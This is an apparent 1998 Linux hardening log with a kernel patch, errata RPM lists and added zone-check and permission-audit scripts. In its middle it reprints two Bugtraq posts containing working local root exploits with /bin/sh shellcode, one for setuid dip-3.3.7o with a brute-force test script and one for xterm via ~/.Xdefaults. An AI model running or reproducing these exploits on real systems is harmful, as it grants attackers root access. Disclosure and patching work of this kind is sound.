2/9/98 Xconfigurator issue (make it 700)
        Date: Fri, 6 Feb 1998 07:59:46 +0100

2/9/98 Remove all old versions of /lib/libc.so.x

2/9/98 Upgrade linux-ld.so.x

4/6/98 Security (make root executable only): /tmp overwrite exploit
        /sbin/Liloconfig (already good perms)
        /sbin/pkgtool.tty and /usr/lib/setup.cpkgtool (fixed)
        /sbin/makebootdisk (fixed)
        /sbin/netconfig.tty and netconfig.color (fixed)

- COPS
        http://www.cdrom.com/pub/linux/sunsite/system/security/cops_104.tgz
- SATAN
        ftp://ftp.win.tue.nl/pub/security/satan.tar.Z
- Solar buffer-overflow fixer
        ftp://ftp.huwig.de/pub/linux/mama/2.0/stack_noexec-symlink-security-fix.bz2

4/19/98: Here is a patch for the "Off by one" IP header bug. Put the following into a file (ie: offbyone.patch) in /usr/src/linux and apply it by running "patch -p1 < offbyone.patch".

----
--- ip_fragment.c.old   Thu Apr 16 12:25:34 1998
+++ ip_fragment.c       Thu Apr 16 12:29:02 1998
@@ -375,7 +375,7 @@
        fp = qp->fragments;
        while(fp != NULL)
        {
-               if (fp->len < 0 || count+fp->len > skb->len)
+               if (fp->len < 0 || fp->offset+qp->ihlen+fp->len > skb->len)
                {
                        NETDEBUG(printk("Invalid fragment list: Fragment over size.\n"));
                        ip_free(qp);
----

Now, re-compile the kernel, move the kernel to /boot, update the /etc/lilo.conf file, re-run "lilo", and reboot.

4/22/98: [linux-security] SECURITY: procps 1.2.7 fixes security hole

5/8/98: Dip and Xterm exploits:

The following code causes a buffer overrun in dip-3.3.7o that comes with linux slakware version 3.4 and maybe others. It can give you root permission if dip file is owned by root and set-user-id bit is set.

This problem was mentioned in this list some days ago by Goran Gajic, and he has also posted some possible ways to correct it.

The code is too messy... but it works.

Regards,
zef

------------------------------ dipr.c -----------------------------
/*
 * dip-3.3.7o buffer overrun 07 May 1998
 *
 * sintax: ./dipr
 *
 *
 * offset: try increments of 50 between 1500 and 3000
 *
 * tested in linux with dip version 3.3.7o (slak 3.4).
 *
 * by zef and r00t @promisc.net
 *
 * http://www.promisc.net
 */

#include
#include

static inline getesp() {
   __asm__(" movl %esp,%eax ");
}

main(int argc, char **argv)
{
  int jump,i,n;
  unsigned long xaddr;
  char *cmd[5], buf[4096];
  char code[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

  jump=atoi(argv[1]);

  for (i=0;i<68;i++) buf[i]=0x41;
  for (n=0,i=68;i<113;i++) buf[i]=code[n++];

  xaddr=getesp()+jump;
  buf[i]=xaddr & 0xff;
  buf[i+1]=(xaddr >> 8) & 0xff;
  buf[i+2]=(xaddr >> 16) & 0xff;
  buf[i+3]=(xaddr >> 24) & 0xff;
  buf[i+4]=xaddr & 0xff;
  buf[i+5]=(xaddr >> 8) & 0xff;
  buf[i+6]=(xaddr >> 16) & 0xff;
  buf[i+6]=(xaddr >> 16) & 0xff;
  buf[i+7]=(xaddr >> 24) & 0xff;

  cmd[0]=malloc(17); strcpy(cmd[0],"/sbin/dip-3.3.7o");
  cmd[1]=malloc(3);  strcpy(cmd[1],"-k");
  cmd[2]=malloc(3);  strcpy(cmd[2],"-l");
  cmd[3]=buf;
  cmd[4]=NULL;

  execve(cmd[0],cmd,NULL);
}
------------------------------- end -------------------------------

Shell script for easy testing :-)

---------------------------- dipr.test ----------------------------
#/bin/bash

if [ ! -x /sbin/dip-3.3.7o ]
then
  echo "could not find file \"/sbin/dip-3.3.7o\"";
  exit -1
fi

if [ ! -u /sbin/dip-3.3.7o ]
then
  echo "dip executable is not suid"
  exit -1
fi

if [ ! -x ./dipr ]
then
  echo "could not find file \"./dipr\"";
  echo "try compiling dipr.c"
  exit -1
fi

x=2000
false
while [ $x -lt 3000 -a $? -ne 0 ]
do
  echo offset=$x
  x=$[x+50]
  ./dipr $x
done
rm -f core
------------------------------- end -------------------------------

Approved-By: aleph1@NATIONWIDE.NET
X-Sender: andrea@dragon.bogus
X-Public-Key-URL: http://www-linux.deis.unibo.it/~mirror/aa.asc
Date: Fri, 8 May 1998 16:50:05 +0200
Reply-To: Andrea Arcangeli
Sender: Bugtraq List
From: Andrea Arcangeli
Subject: xterm exploit [TOG issue]
To: BUGTRAQ@NETSPACE.ORG

/*
    xterm_exp.c : linux/x86 xterm.Xaw exploit
    by alcuin - 5/4/98 - [ http://www.rootshell.com/ ]

    It works against both Xaw and neXtaw widgets

    NB: you have to cp ~/.Xdefaults.old ~/.Xdefaults to be able to use xterm again.
*/

#include
#include
#include

unsigned int getsp() {
  asm("mov %esp,%eax");
}

inline rootshell(){
  __asm__(
    "movb $0x56, %al\n\t"
    "l1:cmpb $0x12, %al\n\t"
    "je l2\n\t"
    "movb $0x12,%al\n\t"
    "call l1\n\t"
    "l2:pop %esi\n\t"
    "xorl %eax,%eax\n\t"
    "movb $0x25, %al\n\t"
    "addl %eax,%esi\n\t"
    "movl %esi,%ebx\n\t"
    "movl %esi,%edi\n\t"
    "movb $8,%al\n\t"
    "addl %eax,%edi\n\t"
    "movb $5,%al\n\t"
    "addl %eax,%esi\n\t"
    "movl %esi,(%edi)\n\t"
    "movl %edi,%ecx\n\t"
    "incl %edi\n\t"
    "incl %edi\n\t"
    "incl %edi\n\t"
    "incl %edi\n\t"
    "xorb %al,%al\n\t"
    "movl %eax,(%edi)\n\t"
    "movl %edi,%edx\n\t"
    "movb $0xb,%al\n\t"
    "int $0x80\n\t"
    ".string \"/bin/sh\"\n"
  );
}

#define CONFFILE ".Xdefaults"
#define OLDFILE ".Xdefaults.old"
#define NEWFILE ".Xdefaults.new"

main (int argc, char **argv) {
  char *home;
  FILE *f_in, *f_out;
  char buf[16384];
  char shellbuf[16384];
  char *s;
  int i;
  unsigned int sp=getsp();

  if (home = getenv("HOME")) chdir(home);
  if (!(f_out = fopen(NEWFILE, "w"))) {
    perror("fopen");
    exit(1);
  }
  if (f_in = fopen(CONFFILE, "r")) {
    fseek(f_in,0,SEEK_SET);
    while (!feof(f_in)) {
      fgets(buf,16384,f_in);
      for (s=buf;isblank(*s);s++);
      if (strncmp(s,"xterm*inputMethod",17)<0) fputs(buf,f_out);
    }
    fclose(f_in);
  }

  /* fill the buffer with nops */
  memset(shellbuf, 0x90, sizeof(shellbuf));
  shellbuf[sizeof(shellbuf)-1] = 0;

  /* write the return adress */
  s = shellbuf+2052;
  *(int *)s=sp+0x69F5;

  /* write the root shell code */
  s = shellbuf+2800;
  strcpy(s,(char*)rootshell);

  fputs("xterm*inputMethod:",f_out);
  fputs(shellbuf, f_out);
  fclose(f_out);

  system("/bin/cp "CONFFILE" "OLDFILE);
  system("/bin/mv -f "NEWFILE" "CONFFILE);
  execl("/usr/X11R6/bin/xterm","xterm",NULL);
}

I can't reproduce the problem with the latest Debian compiled XFree86:

andrea@dragon:~$ dpkg -l xbase
Desired=Unknown/Install/Remove/Purge
| Status=Not/Installed/Config-files/Unpacked/Failed-config/Half-installed
|/ Err?=(none)/Hold/Reinst-required/X=both-problems (Status,Err: uppercase=bad)
||/ Name            Version        Description
+++-===============-==============-============================================
ii  xbase           3.3.2-4        local clients and configuration required by

Andrea[s] Arcangeli
----

5/30/98 - I didn't mention these before but I guess I really should. All users should apply patches for the following problems ASAP. This is where Redhat RPMs and Debian upgrade files really shine and blow away Slackware .PKG files!

Redhat users: Depending on when you purchased your CD, your CD might already have these RPMs installed, so if it says the RPM is already installed, just skip it.

Redhat users #2: If you try to install all the RPMs in a specific dir by typing in "rpm -Uvh *", you might find that about 50% of the RPMs will install and then the RPM program will coredump. I don't know what causes this, but just find the last RPM name that installed successfully, say something with the first letter of "q", and then run this: "rpm -Uvh [qQ-zZ]*.rpm". Ok?

Now, to find out if any new RPM files exist for Redhat, goto http://www.redhat.com/support/docs/errata.html and then look at the upper right-hand corner's date. If this date is NEWER than the 00readme.errata file, then there are newer RPMs. Their documentation system really SUCKS in this respect: though there might be a NEWER RPM for Glibc, they merely update the DATE in the previous Glibc errata entry. Lame eh? So, you will have to page through the different errata listings to find what newer-date entries have been added.

Here is the current RPM list as of May 28th, 1998.
-rw-r--r--   1 root     root        50155 Apr 23 16:14 00README.errata.general
-rw-r--r--   1 root     root        12807 May  6 21:44 00README.errata.intel-specific
drwxr-xr-x   2 root     root         1024 Apr 14 21:26 DEPENDANCIES
drwxr-xr-x   2 root     root         1024 May 30 23:31 NOT-NEEDED
drwxr-xr-x   2 root     root         1024 May 31 00:09 OLD
drwxr-xr-x   2 root     root         1024 May 30 23:31 Old
-rw-r--r--   1 root     root          297 Dec 18 03:05 README.kernl
-rw-r--r--   1 root     root        52313 Jan 22 01:04 Xconfigurator-3.26-1.i386.rpm
-rw-r--r--   1 root     root       473290 Jan 17 00:53 amd-920824upl102-11.i386.rpm
-rw-r--r--   1 root     root       406892 Jan  7 09:55 apache-1.2.5-1.i386.rpm
-rw-r--r--   1 root     root        35815 Dec  6 04:49 autofs-0.3.14-2.i386.rpm
-rw-r--r--   1 root     root       133907 Apr  2 04:40 bind-4.9.6-7.i386.rpm
-rw-r--r--   1 root     root       146104 Apr  2 04:40 bind-utils-4.9.6-7.i386.rpm
-rw-r--r--   1 root     root        61532 Jan  1 01:16 dump-0.3-11.i386.rpm
-rw-r--r--   1 root     root       173348 Jan  8 03:30 elm-2.4.25-11.i386.rpm
-rw-r--r--   1 root     root        89140 Mar 10 06:36 findutils-4.1-21.i386.rpm
-rw-r--r--   1 root     root      3864063 May 11 23:25 glibc-2.0.7-13.i386.rpm
-rw-r--r--   1 root     root         8236 Apr  2 04:40 glibc-debug-2.0.7-6.i386.rpm
-rw-r--r--   1 root     root      2608055 May 11 23:25 glibc-devel-2.0.7-13.i386.rpm
-rw-r--r--   1 root     root      1818742 May 11 16:25 glibc-profile-2.0.7-13.i386.rpm
-rw-r--r--   1 root     root       672255 Dec  9 06:50 gtk-0.99.970925-3.i386.rpm
-rw-r--r--   1 root     root      1727125 Dec  9 06:50 gtk-devel-0.99.970925-3.i386.rpm
-rw-r--r--   1 root     root        60797 Jan 29 05:00 gzip-1.2.4-10.i386.rpm
-rw-r--r--   1 root     root       766023 Dec 12 05:30 imap-4.1.BETA-9.i386.rpm
-rw-r--r--   1 root     root        75202 Mar 21 07:01 info-3.12-1.i386.rpm
-rw-r--r--   1 root     root        33373 Mar 10 22:22 initscripts-3.32-1.i386.rpm
-rw-r--r--   1 root     root       178953 Dec 31 02:59 ircii-2.8.2-13.i386.rpm
-rw-r--r--   1 root     root       181636 Dec 31 02:59 ircii-help-2.8.2-13.i386.rpm
-rw-r--r--   1 root     root       109332 Dec 13 00:22 joe-2.8-10.i386.rpm
-rw-r--r--   1 root     root       157369 Dec 10 09:22 kaffe-0.9.2-3.i386.rpm
-rw-r--r--   1 root     root       228211 Dec 10 09:22 kaffe-bissawt-0.9.2-3.i386.rpm
-rw-r--r--   1 root     root       461808 Mar 26 00:32 kbd-0.94-6.i386.rpm
-rw-r--r--   1 root     root        67794 Nov 27  1997 ld.so-1.9.5-5.i386.rpm
-rw-r--r--   1 root     root      1984591 Dec 25 03:56 libc-5.3.12-25.i386.rpm
-rw-r--r--   1 root     root        70068 Apr 23 22:36 lpr-0.31-1.i386.rpm
-rw-r--r--   1 root     root       722723 Apr  2 04:41 lynx-2.8-1.i386.rpm
-rw-r--r--   1 root     root      1156113 Mar 22 04:54 mh-6.8.4-6.i386.rpm
-rw-r--r--   1 root     root         5854 Mar 24 23:44 mkinitrd-1.8-1.i386.rpm
-rw-r--r--   1 root     root        28709 Dec  9 06:50 mouseconfig-2.22-1.i386.rpm
-rw-r--r--   1 root     root        77534 Mar 21 04:39 ncftp-2.4.3-1.i386.rpm
-rw-r--r--   1 root     root       525312 Dec 31 23:16 ncurses-1.9.9e-8.i386.rpm
-rw-r--r--   1 root     root      6007864 Jan 24 06:20 netscape-navigator-4.04-3.i386.rpm
-rw-r--r--   1 root     root       263775 Nov 27  1997 pcmcia-cs-2.9.12-2.i386.rpm
-rw-r--r--   1 root     root      3260216 Mar 11 02:44 perl-5.004-4.i386.rpm
-rw-r--r--   1 root     root       897523 Jan 16 04:19 pine-3.96-7.i386.rpm
-rw-r--r--   1 root     root        23130 Jan  9 03:07 portmap-4.0-8.i386.rpm
-rw-r--r--   1 root     root       116018 Jan 17 00:53 ppp-2.3.3-2.i386.rpm
-rw-r--r--   1 root     root        86183 Apr 18 03:59 procps-1.2.7-1.i386.rpm
-rw-r--r--   1 root     root        11629 Apr 18 03:59 procps-X11-1.2.7-1.i386.rpm
-rw-r--r--   1 root     root        34085 Jan 16 00:24 quota-1.55-7.i386.rpm
-rw-r--r--   1 root     root       369372 May 28 00:55 rpm-2.5.1-1.i386.rpm
-rw-r--r--   1 root     root       139657 Dec 31 22:12 shadow-utils-970616-11.i386.rpm
-rw-r--r--   1 root     root        22797 Dec 19 00:18 smbfs-2.0.1-2.i386.rpm
-rw-r--r--   1 root     root       195341 Mar 26 00:32 svgalib-1.2.11-4.i386.rpm
-rw-r--r--   1 root     root        89839 Dec  6 04:49 tcp_wrappers-7.6-2.i386.rpm
-rw-r--r--   1 root     root       315350 Mar 21 07:01 texinfo-3.12-1.i386.rpm
-rw-r--r--   1 root     root       229179 Mar 10 06:36 textutils-1.22-5.i386.rpm
-rw-r--r--   1 root     root         6611 Jan 16 00:05 tmpwatch-1.5-1.i386.rpm
-rw-r--r--   1 root     root        97906 Nov 27  1997 transfig-3.2-3.i386.rpm
-rw-r--r--   1 root     root       182682 Dec 31 02:59 trn-3.6-11.i386.rpm
-rw-r--r--   1 root     root        12634 Dec 18 03:06 usernet-1.0.6-1.i386.rpm
-rw-r--r--   1 root     root       343980 Dec 30 03:13 util-linux-2.7-15.i386.rpm
-rw-r--r--   1 root     root        28632 Dec 13 00:22 vixie-cron-3.0.1-20.i386.rpm
-rw-r--r--   1 root     root       102656 Dec 13 00:22 wu-ftpd-2.4.2b15-6.i386.rpm
-rw-r--r--   1 root     root         4493 Feb  4 22:31 xserver-wrapper-1.1-1.i386.rpm
-rw-r--r--   1 root     root        19439 Dec 20 23:25 ypbind-3.3-2.i386.rpm

Applied the following patches on 5/30/98:

        rpm -Uvh --force --nodeps rpm-2.5.1-1.i386.rpm
        rpm -Uvh glibc-2.0.7-13.i386.rpm
        rpm -Uvh glibc-devel-2.0.7-13.i386.rpm

Applied the following on 6/1/98 to fix the --nodeps issue:

        rpm -Uvh patch-2.5.2.i386.rpm

6/13/98 - SSH 1.2.25 update. There is a new SSH exploit that requires that users upgrade to 1.2.25 ASAP!!!! See the SSH chapter, Section 28, for URLs.
----
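The forward zone (trinity.db) and reverse zone (192.168.db) in Section 22 have to agree with each other, and named will load both happily even when they do not. The script below is an added example, not part of TrinityOS: it cross-checks a BIND v4 forward zone against its in-addr.arpa zone and reports A records with no PTR, PTRs with no A, and PTR/A pairs that name different hosts. The sample zones it writes are copied from the Section 22 listings (SOA blocks left out); the function names are my own.

```shell
#!/bin/sh
# Added example (not part of TrinityOS): cross-check a BIND v4 forward zone
# against its in-addr.arpa reverse zone. Sample data is copied from the
# trinity.db / 192.168.db listings in Section 22; function names are mine.

# Write the two sample zone files into directory $1 (only the A/PTR/NS
# lines matter for the check, so the SOA blocks are omitted here).
write_sample_zones() {
    cat > "$1/trinity.db" <<'EOF'
trinity.value.net.              IN NS   trinity.trinity.value.net.
trinity.trinity.value.net.      IN A    192.168.0.1
stimpy2.trinity.value.net.      IN A    192.168.0.2
dellster.trinity.value.net.     IN A    192.168.0.4
spare.trinity.value.net.        IN A    192.168.0.9
spare2.trinity.value.net.       IN A    192.168.0.10
hub.trinity.value.net.          IN A    192.168.0.250
EOF
    cat > "$1/192.168.db" <<'EOF'
0.168.192.in-addr.arpa.         IN NS   trinity.trinity.value.net.
1       IN PTR  trinity.trinity.value.net.
2       IN PTR  stimpy2.trinity.value.net.
3       IN PTR  spare.trinity.value.net.
4       IN PTR  dellster.trinity.value.net.
9       IN PTR  spare.trinity.value.net.
10      IN PTR  spare2.trinity.value.net.
250     IN PTR  hub.trinity.value.net.
EOF
}

# check_zones FORWARD REVERSE PREFIX
#   FORWARD: zone file with "name IN A addr" lines
#   REVERSE: /24 reverse zone with "last-octet IN PTR name." lines
#   PREFIX : first three octets the reverse zone covers, e.g. 192.168.0
# Prints one line per inconsistency; prints nothing when the zones agree.
check_zones() {
    awk -v net="$3" '
        # pass 1 (forward zone): remember A[address] = owner name
        FNR == NR {
            if ($1 !~ /^;/ && $2 == "IN" && $3 == "A") A[$4] = $1
            next
        }
        # pass 2 (reverse zone): every PTR must point back at the A owner
        $1 !~ /^;/ && $2 == "IN" && $3 == "PTR" {
            addr = net "." $1
            P[addr] = $4
            if (!(addr in A))
                print "PTR without A:  " addr " -> " $4
            else if (A[addr] != $4)
                print "PTR/A mismatch: " addr " A=" A[addr] " PTR=" $4
        }
        # and every A must have a PTR of its own
        END {
            for (a in A) if (!(a in P))
                print "A without PTR:  " a " -> " A[a]
        }
    ' "$1" "$2"
}

# Demo on the Section 22 data: 192.168.0.3 has a PTR to "spare" but the
# forward zone puts spare at 192.168.0.9, so one "PTR without A" line appears.
demo_dir=$(mktemp -d)
write_sample_zones "$demo_dir"
check_zones "$demo_dir/trinity.db" "$demo_dir/192.168.db" 192.168.0
rm -rf "$demo_dir"
```

Run it against /var/named/trinity.db and /var/named/192.168.db after every zone edit (and bump the SOA serial at the same time); an empty result means the two files agree.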
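Several of the fixes in Section 34 come down to the same two checks: strip the setuid/setgid bits from programs that do not need them (the Xkb note's "chmod u-s,g-s" on the X servers, the /tmp overwrite list) and make sure device nodes are not readable or writable by everyone (the /dev/psaux fix and the "Device DoS" ls | grep "r-- " check). The script below is an added example, not part of TrinityOS: audit_perms walks a tree and reports both classes so the output can be saved and diffed from cron after each round of RPM upgrades. build_demo_tree creates a constructed sample so it runs without touching the real system; regular files stand in for device nodes there (mknod needs root), and the file names in it are only illustrative.

```shell
#!/bin/sh
# Added example (not part of TrinityOS): report the file-permission problems
# that Section 34 fixes by hand, so the check can be repeated after upgrades.
#   SETID            a regular file with the setuid or setgid bit set
#   DEV_OTHER_ACCESS an entry under a dev directory readable/writable by "other"
# The demo tree below is constructed; regular files stand in for device nodes.

# audit_perms ROOT DEVDIR
#   ROOT   : tree to scan for setuid/setgid files
#   DEVDIR : directory whose entries must not be other-readable/writable
# Output: "<class> <mode> <path>" per finding, sorted; empty when clean.
audit_perms() {
    {
        # -perm -4000 / -2000: setuid / setgid bit present
        find "$1" -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} + 2>/dev/null |
            awk '{ print "SETID", $1, $NF }'
        # -perm -004 / -002: the "other" read / write bit present
        find "$2" ! -type d \( -perm -004 -o -perm -002 \) -exec ls -ld {} + 2>/dev/null |
            awk '{ print "DEV_OTHER_ACCESS", $1, $NF }'
    } | sort
}

# Number of findings; handy for a cron job that only mails when non-zero.
audit_count() {
    audit_perms "$1" "$2" | wc -l | tr -d ' '
}

# Build a constructed sample tree and print its path.
build_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/X11R6/bin" "$d/bin" "$d/dev"
    : > "$d/usr/X11R6/bin/XF86_SVGA"; chmod 4755 "$d/usr/X11R6/bin/XF86_SVGA" # setuid X server: flagged
    : > "$d/bin/ls";                  chmod 0755 "$d/bin/ls"                   # ordinary binary: clean
    : > "$d/dev/psaux";               chmod 0664 "$d/dev/psaux"                # other-readable "device": flagged
    : > "$d/dev/ttyS0";               chmod 0660 "$d/dev/ttyS0"                # group only: clean
    echo "$d"
}

# Demo: two findings, the setuid X server and the other-readable psaux node.
demo=$(build_demo_tree)
audit_perms "$demo" "$demo/dev"
rm -rf "$demo"
```

On a real box call it as "audit_perms / /dev" and keep the first run's output as a baseline; anything that appears in a later diff is either a package upgrade that re-added a setuid bit or something to look into.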